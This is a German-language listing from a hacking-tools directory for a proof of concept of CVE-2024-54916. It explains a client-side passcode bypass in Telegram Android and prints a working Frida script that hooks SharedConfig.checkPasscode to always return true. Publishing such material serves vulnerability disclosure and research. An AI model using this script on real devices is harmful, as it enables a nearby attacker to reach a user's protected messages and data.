Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-54916 — Frida-basierter Proof-of-Concept, der Authentifizierungsumgehung in Telegram Android demonstriert, indem SharedConfig.checkPasscode gehooked wird, um immer true zurückzugeben, was unbefugten Zugriff ermöglicht. | Kitploit
Tools/GitHubGitHub/sahalll/cve-2024-54916
Android-SicherheitDynamische Analyse (Sandboxing)SchwachstellenanalyseExploitationMobile SicherheitBinäranalyseAuthentifizierung
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Frida-basierter Proof-of-Concept, der Authentifizierungsumgehung in Telegram Android demonstriert, indem SharedConfig.checkPasscode gehooked wird, um immer true zurückzugeben, was unbefugten Zugriff ermöglicht.

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-54916: Authentifizierungsumgehung auf Telegram APK

Ein Problem in der SharedConfig-Klasse von Telegram Android APK v.11.7.0 ermöglicht einem physisch nahen Angreifer, die Authentifizierung zu umgehen und Berechtigungen zu eskalieren, indem er den Rückgabewert der checkPasscode-Methode manipuliert.

Schwachstellentyp

Authentifizierungsumgehung

Produktanbieter

Telegram

Betroffene Produktcodebasis

Telegram Android APK v.11.7.0

Betroffene Komponente

org.telegram.messenger.SharedConfig

Ausnutzung

Identifizieren der Zielklasse und -methode:

  • Die SharedConfig-Klasse in der Anwendung verwaltet die Logik für die Passcode-Überprüfung.
  • Die checkPasscode-Methode innerhalb dieser Klasse ist für die Bestimmung der Gültigkeit des eingegebenen Passcodes verantwortlich.

Hooking der Methode mit Frida

  • Ein Frida-Skript wird verwendet, um in die checkPasscode-Methode der SharedConfig-Klasse einzuhaken. Die Implementierung der Methode wird so geändert, dass sie immer 'true' zurückgibt, wodurch die eigentliche Passcode-Überprüfung umgangen wird.

Ausführung

  • Das Frida-Skript wird ausgeführt, während die App läuft (dynamisch). Jede vom Benutzer eingegebene Passcode wird als gültig akzeptiert, was unbefugten Zugriff ermöglicht.

PoC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

Video PoC-Link:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

Auswirkungen:-

Diese Schwachstelle ist ein Problem der clientseitigen Authentifizierungsumgehung. Sie betrifft Benutzer, die auf die Passcode-Funktion angewiesen sind, um sensible Daten zu schützen oder den Zugriff auf bestimmte App-Funktionen einzuschränken. Durch Ausnutzung dieses Fehlers kann ein physisch naher Angreifer den Passcode-Überprüfungsprozess manipulieren, die Authentifizierung umgehen und unbefugten Zugriff auf geschützte Bereiche der App erhalten. Dies könnte zur Offenlegung sensibler Benutzerdaten oder zu unbefugten Aktionen innerhalb der Anwendung führen.

Tool herunterladen